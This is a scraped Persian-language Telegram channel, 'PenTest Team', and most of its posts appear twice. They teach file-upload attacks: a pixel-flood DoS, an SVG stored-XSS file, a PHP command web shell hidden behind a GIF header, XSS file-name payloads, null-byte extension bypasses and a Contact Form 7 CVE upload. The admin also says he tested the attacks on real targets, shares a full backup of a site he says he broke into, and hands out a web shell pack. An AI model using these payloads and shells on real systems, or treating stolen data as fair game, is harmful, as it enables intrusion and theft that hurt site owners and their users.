#رایتاپ
🗒 Remote file upload (Pixel flood attack leading to Application level Dos Attack)
توضيحات -->
خب بچها اگه ما اپلودری داشته باشیم که حداکثر محدودیت پیکسلی نداشته باشه و تصویری که آپلود میکنیم سمت سرور و توی backend پردازش بشه میتونیم از این آسیب پذیری استفاده کنیم
عملکرد -->
اگه مهاجم یک تصویر با پیکسل بزرگ مثلا با پیکسل 64250*64250 آپلود بکنه سرور میاد کل تصوير رو در حافظه بارگذاری میکنه یعنی میاد 4128062500 پیکسل رو به حافظه اختصاص میده (یعنی سرور میاد کل حافظشو میذاره تا بتونه عکس رو بخونه و لود کنه و در این حالت حافظه سیستم پر میشه و سیستم کرش میکنه و down میشه! ) و باعث حمله DOS میشه.
جلوگیری از این آسیب پذیری -->
خب اگه برنامه نویس هستین حتما محدودیت پیکسلی بذارین تا کاربر نتونه عکس با هر پیکسلی رو آپلود بکنه.
Reference:
https://hackerone.com/reports/390
https://hackerone.com/reports/970760
#RFU
#DOS
@pentest_team
🗒 Remote file upload (Pixel flood attack leading to Application level Dos Attack)
توضيحات -->
خب بچها اگه ما اپلودری داشته باشیم که حداکثر محدودیت پیکسلی نداشته باشه و تصویری که آپلود میکنیم سمت سرور و توی backend پردازش بشه میتونیم از این آسیب پذیری استفاده کنیم
عملکرد -->
اگه مهاجم یک تصویر با پیکسل بزرگ مثلا با پیکسل 64250*64250 آپلود بکنه سرور میاد کل تصوير رو در حافظه بارگذاری میکنه یعنی میاد 4128062500 پیکسل رو به حافظه اختصاص میده (یعنی سرور میاد کل حافظشو میذاره تا بتونه عکس رو بخونه و لود کنه و در این حالت حافظه سیستم پر میشه و سیستم کرش میکنه و down میشه! ) و باعث حمله DOS میشه.
جلوگیری از این آسیب پذیری -->
خب اگه برنامه نویس هستین حتما محدودیت پیکسلی بذارین تا کاربر نتونه عکس با هر پیکسلی رو آپلود بکنه.
Reference:
https://hackerone.com/reports/390
https://hackerone.com/reports/970760
#RFU
#DOS
@pentest_team
👍22😱3❤2
#رایتاپ
🗒 Remote file upload (SVG file upload to achieve Stored XSS)
توضيحات -->
اگه آپلودر اجازه آپلود فایل های SVG(Scalable Vector Graphics) رو بده میتونیم اگه سایت آسیب پذیر باشه میتونیم از سایت باگ XSS بگیریم.
عملکرد -->
ما یک فایل SVG درست میکنیم و تیکه کد زیر رو درونش قرار میدیم
===========================
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("SVG to XSS : )");
</script>
</svg>
=============================
خب محتوای بالا رو درون فایل SVG قرار میدیم و فایل رو با پسوند svg. ذخیره میکنیم و فایل رو ذخیره میکنیم و content-type اون میشه image/svg+xml که میتونین اونو مشاهده کنین فایل رو آپلود میکنیم و با مسیر آپلود فایل میریم برای مثال
http://vulnerable.com/uploads/xss.svg
و باعث ایجاد آسيب پذیری Stored XSS میشه!
جلوگیری از این آسیب پذیری -->
اگه برای مثال سایت آپلود فایل دارید اجازه خواندن مستقیم فایل SVG رو ندین.
#RFU
#XSS
@pentest_team
🗒 Remote file upload (SVG file upload to achieve Stored XSS)
توضيحات -->
اگه آپلودر اجازه آپلود فایل های SVG(Scalable Vector Graphics) رو بده میتونیم اگه سایت آسیب پذیر باشه میتونیم از سایت باگ XSS بگیریم.
عملکرد -->
ما یک فایل SVG درست میکنیم و تیکه کد زیر رو درونش قرار میدیم
===========================
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("SVG to XSS : )");
</script>
</svg>
=============================
خب محتوای بالا رو درون فایل SVG قرار میدیم و فایل رو با پسوند svg. ذخیره میکنیم و فایل رو ذخیره میکنیم و content-type اون میشه image/svg+xml که میتونین اونو مشاهده کنین فایل رو آپلود میکنیم و با مسیر آپلود فایل میریم برای مثال
http://vulnerable.com/uploads/xss.svg
و باعث ایجاد آسيب پذیری Stored XSS میشه!
جلوگیری از این آسیب پذیری -->
اگه برای مثال سایت آپلود فایل دارید اجازه خواندن مستقیم فایل SVG رو ندین.
#RFU
#XSS
@pentest_team
👍27❤4
PenTest Team
#رایتاپ 🗒 Remote file upload (SVG file upload to achieve Stored XSS) توضيحات --> اگه آپلودر اجازه آپلود فایل های SVG(Scalable Vector Graphics) رو بده میتونیم اگه سایت آسیب پذیر باشه میتونیم از سایت باگ XSS بگیریم. عملکرد --> ما یک فایل SVG درست میکنیم…
RFU-via-XSS.rar
9.7 MB
بچها اینم نحوه اکسپلویت کردنش روی دوتا تارگت واقعی تست کردم براتون برای اینکه کیفیتش نیاد پایین rar آپلود کردم
حتما ببینید روند ادامه چنل رو هم توضیح دادم
@pentest_team
حتما ببینید روند ادامه چنل رو هم توضیح دادم
@pentest_team
👍26❤2🤡1
#رایتاپ
🗒 Remote file upload (Content Check Bypass)
توضيحات -->
اگه آپلودر بیاد مقادیر فایل و محتوای آپلود شده رو برسی میکنه حالا گاهی از اول و گاهی از آخر که میتونیم اون رو بایپس کنیم.
عملکرد -->
خب میایم محتوای فایل آپلود شده خودمون رو برای مثال شل خودمون رو داخل {} ;GIF89a قرار میدیم و تایپی (Content-type ) که فایل پیدا میکنه میشه image /gif و در نهایت ما میتونیم فایل رو آپلود کنیم و برای مثال
GIF89a; {<?php system($_GET["cmd"]); ?>}
این شل ما میشه!
جلوگیری از این آسیب پذیری -->
اگه برنامه نویس هستین و آپلودر شما مقادیر رو بررسی میکنه باید کل مقادیر رو بررسی بکنه و نه از اول و آخر باید کل محتوا رو بخونه!
#RFU
#bypass
@pentest_team
🗒 Remote file upload (Content Check Bypass)
توضيحات -->
اگه آپلودر بیاد مقادیر فایل و محتوای آپلود شده رو برسی میکنه حالا گاهی از اول و گاهی از آخر که میتونیم اون رو بایپس کنیم.
عملکرد -->
خب میایم محتوای فایل آپلود شده خودمون رو برای مثال شل خودمون رو داخل {} ;GIF89a قرار میدیم و تایپی (Content-type ) که فایل پیدا میکنه میشه image /gif و در نهایت ما میتونیم فایل رو آپلود کنیم و برای مثال
GIF89a; {<?php system($_GET["cmd"]); ?>}
این شل ما میشه!
جلوگیری از این آسیب پذیری -->
اگه برنامه نویس هستین و آپلودر شما مقادیر رو بررسی میکنه باید کل مقادیر رو بررسی بکنه و نه از اول و آخر باید کل محتوا رو بخونه!
#RFU
#bypass
@pentest_team
👍16❤3
Media is too big
VIEW IN TELEGRAM
باگ sqli union
سلام بچها آموزش باگ sql injection متد union ببینید و رایتاپ هاشم قرار میدیم.
@pentest_team
سلام بچها آموزش باگ sql injection متد union ببینید و رایتاپ هاشم قرار میدیم.
@pentest_team
🔥23👍5😁3❤2
#رایتاپ
🗒 Remote file upload (File Name As XSS Payloads)
توضيحات -->
خب فرض میکنیم ما اپلودری داریم و میخوایم عکسی رو آپلود کنیم و ما اگه بیایم به جای نام عکس پیلود xss خودمون رو قرار بدیم و اگه آپلودر همچین آسیب پذیری رو داشته باشه میتونیم باگ xss بگیریم.
عملکرد -->
خب موقع آپلود فایل ما میایم بجای نام فایل پیلود خودمون رو قرار میدیم بفرض مثال :
'"><img src=x onerror=alert(document.domain)>.png
یا
{{constructor.constructor('alert(1)')()}}.png
و میبینم که آپلودر به ما alert رو نشون میده!
جلوگیری از این آسیب پذیری -->
خب بچها اگه برنامه نویس هستین ورودی هارو فیلتر کنین تا کاربر نتونه هر ورودی که مد نظرش بوده رو وارد کنه.
#RFU
#XSS
@pentest_team
🗒 Remote file upload (File Name As XSS Payloads)
توضيحات -->
خب فرض میکنیم ما اپلودری داریم و میخوایم عکسی رو آپلود کنیم و ما اگه بیایم به جای نام عکس پیلود xss خودمون رو قرار بدیم و اگه آپلودر همچین آسیب پذیری رو داشته باشه میتونیم باگ xss بگیریم.
عملکرد -->
خب موقع آپلود فایل ما میایم بجای نام فایل پیلود خودمون رو قرار میدیم بفرض مثال :
'"><img src=x onerror=alert(document.domain)>.png
یا
{{constructor.constructor('alert(1)')()}}.png
و میبینم که آپلودر به ما alert رو نشون میده!
جلوگیری از این آسیب پذیری -->
خب بچها اگه برنامه نویس هستین ورودی هارو فیلتر کنین تا کاربر نتونه هر ورودی که مد نظرش بوده رو وارد کنه.
#RFU
#XSS
@pentest_team
🔥8👍5❤1🤔1
This media is not supported in your browser
VIEW IN TELEGRAM
🗒 Bypass File Uploader [Content-Type] Shell Upload! | Bug Bounty
توصیحات --> بایپس آپلودر و آپلود شل
#RFU
#shell
@pentest_team
توصیحات --> بایپس آپلودر و آپلود شل
#RFU
#shell
@pentest_team
🔥12😁2❤1👍1
#رایتاپ
🗒 باگ 6000$ هزار دلاری از Cloudflare
https://deb0con.medium.com/how-i-earned-a-6000-bug-bounty-from-cloudflare-db6949e39cf7
@pentest_team
🗒 باگ 6000$ هزار دلاری از Cloudflare
https://deb0con.medium.com/how-i-earned-a-6000-bug-bounty-from-cloudflare-db6949e39cf7
@pentest_team
👍19👏4
کد فعالسازی تلگرام توسط اپراتورهای مخابرات ایران مسدود شد!
=========================
تلگرام خود را به هیچ وجه پاک نکنید و در صورت امکان یک اکانت پشتیبان روی یک اپلیکیشن تلگرام جدید تهیه کنید
متاسفانه دیگر امکان دریافت کد فعال سازی تا اطلاع ثانوی از طریق پیامک وجود ندارد
پس از اکانت خودتون تو تلگرام خارج نشوید
بچه ها این جریان برای توییتر و اینستاگرام هم داره اتفاق میوفته اگه توی اینستاگرام تایید دو مرحله ای دارین از sms به اپلیکیشن تغییرش بدین
=========================
تلگرام خود را به هیچ وجه پاک نکنید و در صورت امکان یک اکانت پشتیبان روی یک اپلیکیشن تلگرام جدید تهیه کنید
متاسفانه دیگر امکان دریافت کد فعال سازی تا اطلاع ثانوی از طریق پیامک وجود ندارد
پس از اکانت خودتون تو تلگرام خارج نشوید
بچه ها این جریان برای توییتر و اینستاگرام هم داره اتفاق میوفته اگه توی اینستاگرام تایید دو مرحله ای دارین از sms به اپلیکیشن تغییرش بدین
🤯24👍7😱4😁2🤔2😢2
ktae.ir-@pentest_team.zip
121.1 MB
بکاپ کامل سایت ktae.ir خودم دسترسی گرفتم و بکاپ از کل سایت گرفتم براتون ولی چکش نکردم چکش کنید چیز بدرد بخوری بود استفاده کنید.
@pentest_team
@pentest_team
👏19👍6🤔5😁2❤1🔥1
Upload Shell (2).rar
199 MB
🗒 آموزش باگ Remote file upload و آپلود shell
خب بچها اول از همه یه توضیح واسه باگ RFU دادم برای بچهایی که صفر صفرن بعدش رفتیم سراغ تارگت واقعی و اپلودرش رو بایپس کردیم و تونستیم شل آپلود کنیم و از سایت دسترسی بگیریم فقط وسط کار شل و اشتباهی انتخاب کردم ویدئو یه برشی خورد که تایم بالا نره😐❤️
@pentest_team
خب بچها اول از همه یه توضیح واسه باگ RFU دادم برای بچهایی که صفر صفرن بعدش رفتیم سراغ تارگت واقعی و اپلودرش رو بایپس کردیم و تونستیم شل آپلود کنیم و از سایت دسترسی بگیریم فقط وسط کار شل و اشتباهی انتخاب کردم ویدئو یه برشی خورد که تایم بالا نره😐❤️
@pentest_team
👍24❤1🤔1
#رایتاپ
🗒 Remote file upload (Bypass White-list)
نمونه کد آسیب پذیر -->
خب بچها کد زیر نمونه ای از کد آسیب پذیر اپلودره که بر اساس الگوریتم White-list میاد و Extension رو بررسی میکنه که توی این پست توضیح دادیم
=============================
<?php
$file = $_FILES['file']['name'];
$extension = explode(".", $file)[1];
if ($extension == "jpeg" $extension == "jpg" $extension == "png") {
echo "File Uploaded";
// Do the necessary operations
} else {
echo "Only JPG/JPEG and PNG files are allowed";
}
?>
=============================
خب کد بالا میگه بیا و از کاربر فایلی رو دریافت کن و پسوند و یا Extension اون رو بررسی کن که باید یا jpeg یا jpg و یا png باشه و اگه بود فایل رو آپلود کن در غیر این صورت چاپ کن فقط این سه پسوند قادر به آپلود شدن هستند.
بایپس های White-list -->
خب بچها این چنتا بایپس برای White-list هست
shell.php%00.jpg
file.php%00.png
file.php%00
file.php%20
file.php...... -->
file.php…:.jpg
یا
shell.php\x00.jpg
file.php/
و میتونیم این کارو رو با نرم افزار burp Suite انجام بدیم بطور مثال میتونیم نام فایل رو
shell.phpD.jpg
بنویسیم و بعد از ارسال فایل درخواستمون رو داخل burp Suite به صورت هگز در بیاریم و با پیدا کردن عدد 44 که هگز شده هست اونو به 00 تغییر بدیم و درخواست رو ارسال کنیم
#RFU
#White_List
@pentest_team
🗒 Remote file upload (Bypass White-list)
نمونه کد آسیب پذیر -->
خب بچها کد زیر نمونه ای از کد آسیب پذیر اپلودره که بر اساس الگوریتم White-list میاد و Extension رو بررسی میکنه که توی این پست توضیح دادیم
=============================
<?php
$file = $_FILES['file']['name'];
$extension = explode(".", $file)[1];
if ($extension == "jpeg"
echo "File Uploaded";
// Do the necessary operations
} else {
echo "Only JPG/JPEG and PNG files are allowed";
}
?>
=============================
خب کد بالا میگه بیا و از کاربر فایلی رو دریافت کن و پسوند و یا Extension اون رو بررسی کن که باید یا jpeg یا jpg و یا png باشه و اگه بود فایل رو آپلود کن در غیر این صورت چاپ کن فقط این سه پسوند قادر به آپلود شدن هستند.
بایپس های White-list -->
خب بچها این چنتا بایپس برای White-list هست
shell.php%00.jpg
file.php%00.png
file.php%00
file.php%20
file.php...... -->
file.php…:.jpg
یا
shell.php\x00.jpg
file.php/
و میتونیم این کارو رو با نرم افزار burp Suite انجام بدیم بطور مثال میتونیم نام فایل رو
shell.phpD.jpg
بنویسیم و بعد از ارسال فایل درخواستمون رو داخل burp Suite به صورت هگز در بیاریم و با پیدا کردن عدد 44 که هگز شده هست اونو به 00 تغییر بدیم و درخواست رو ارسال کنیم
#RFU
#White_List
@pentest_team
👍18❤6🤔3🔥1
Media is too big
VIEW IN TELEGRAM
آموزش باگ Directory Listing و نحوه ایجاد شدن این باگ و در نهایت چند تا سایت بررسی شده.
#Directory_Listing
@pentest_team
#Directory_Listing
@pentest_team
🔥9👍2😱1
❤3🥰2👍1
PenTest Team
سلام بچها گروه PenTest Team رو زدیم دوست داشتید جوین شین❤️ @PenTest_Team_Gap
بچها جوین شین کسی سوال داشت بپرسه بچها بتونن جواب میدن
#رایتاپ
🗒 Upload file Custom In WordPress Plugin Contact Form 7 (CVE-2020-35489)
توضيحات -->
خب بچها این آسیب پذیری بحرانی در پلاگین Contact Form 7 و در زمان انتشار اکسپلویت این آسیب پذیری حدود 3.5 میلیون سایت وردپرسی دارای این آسیب پذیری بودن
و توی این آسیب پذیری مهاجم میتونه بصگرت نامحدود فایل آپلود کنه.
عملکرد -->
خب بچها اول یه توضیح درمورد این افزونه بدم این افزونه به مدیر وبسایت وردپرسی فرم تماس در وبسایتش ایجاد کنه و کاربر های سایت میتونن اطلاعات تماس خودشون رو برا مدیر بفرستن
خب بریم سراغ این آسیب پذیری این همون بایپس اپلودره بصورت White-list هستش که توی این پست در موردش حرف زدیم و میایم شل خودمون رو shell.php.png به این صورت آپلود میکنیم همونطور که در تصویر میبینید و آپلودر میاد پسوند اولی رو حذف میکنه (یعنی از راست میخونه و تا رسید به نقطه پاک هر چی قبلش باشه رو پاک میکنه ) و پسوند دوم رو بخاطر نقطه حذف نمیکنه و میاد با پسوند دوم و فایل نهایی میشه shell.php و در سرور آپلود میشه و میتونین دسترسی بگیرین از سایت و مسیر فایل آپلود شده بصورت پیش فرض wp-content/uploads ولی میتونیم با تعریف WPCF7_UPLOADS_TMP_DIR بصورت زیر تغییر بدیم
define( 'WPCF7_UPLOADS_TMP_DIR', '/your/file/path');
نحوه جلوگیری از این آسیب پذیری -->
خب تیم توسعه دهنده Contact Form 7 در زمان انتشار اکسپلویت این آسیب پذیری سریعا این باگ رو پچ کردن و اگه وبسایت وردپرسی دارین که از این افزونه استفاده میکنه سریعا به آخرین نسخه آپدیت کنید
#RFU
@PenTest_Team
🗒 Upload file Custom In WordPress Plugin Contact Form 7 (CVE-2020-35489)
توضيحات -->
خب بچها این آسیب پذیری بحرانی در پلاگین Contact Form 7 و در زمان انتشار اکسپلویت این آسیب پذیری حدود 3.5 میلیون سایت وردپرسی دارای این آسیب پذیری بودن
و توی این آسیب پذیری مهاجم میتونه بصگرت نامحدود فایل آپلود کنه.
عملکرد -->
خب بچها اول یه توضیح درمورد این افزونه بدم این افزونه به مدیر وبسایت وردپرسی فرم تماس در وبسایتش ایجاد کنه و کاربر های سایت میتونن اطلاعات تماس خودشون رو برا مدیر بفرستن
خب بریم سراغ این آسیب پذیری این همون بایپس اپلودره بصورت White-list هستش که توی این پست در موردش حرف زدیم و میایم شل خودمون رو shell.php.png به این صورت آپلود میکنیم همونطور که در تصویر میبینید و آپلودر میاد پسوند اولی رو حذف میکنه (یعنی از راست میخونه و تا رسید به نقطه پاک هر چی قبلش باشه رو پاک میکنه ) و پسوند دوم رو بخاطر نقطه حذف نمیکنه و میاد با پسوند دوم و فایل نهایی میشه shell.php و در سرور آپلود میشه و میتونین دسترسی بگیرین از سایت و مسیر فایل آپلود شده بصورت پیش فرض wp-content/uploads ولی میتونیم با تعریف WPCF7_UPLOADS_TMP_DIR بصورت زیر تغییر بدیم
define( 'WPCF7_UPLOADS_TMP_DIR', '/your/file/path');
نحوه جلوگیری از این آسیب پذیری -->
خب تیم توسعه دهنده Contact Form 7 در زمان انتشار اکسپلویت این آسیب پذیری سریعا این باگ رو پچ کردن و اگه وبسایت وردپرسی دارین که از این افزونه استفاده میکنه سریعا به آخرین نسخه آپدیت کنید
#RFU
@PenTest_Team
👍10🤯1
12.آموزش SQL مقدماتی.rar
458 MB
بچها اینم آموزش SQL پیشنیاز sql injection فقط ریپورت نکنین به چوخ بریم میذارم استفاده کنین ❤️
@pentest_team
@pentest_team
🔥19❤4👍1
Pack-webShell @PenTest_Team.zip
24.7 MB
خب بچها اینم یه پک وب شل برای تموم زبان ها php, asp, aspx, jsp و.... داشته باشین بدردتون میخوره ❤️
@PenTest_Team
@PenTest_Team
🔥13❤2👍1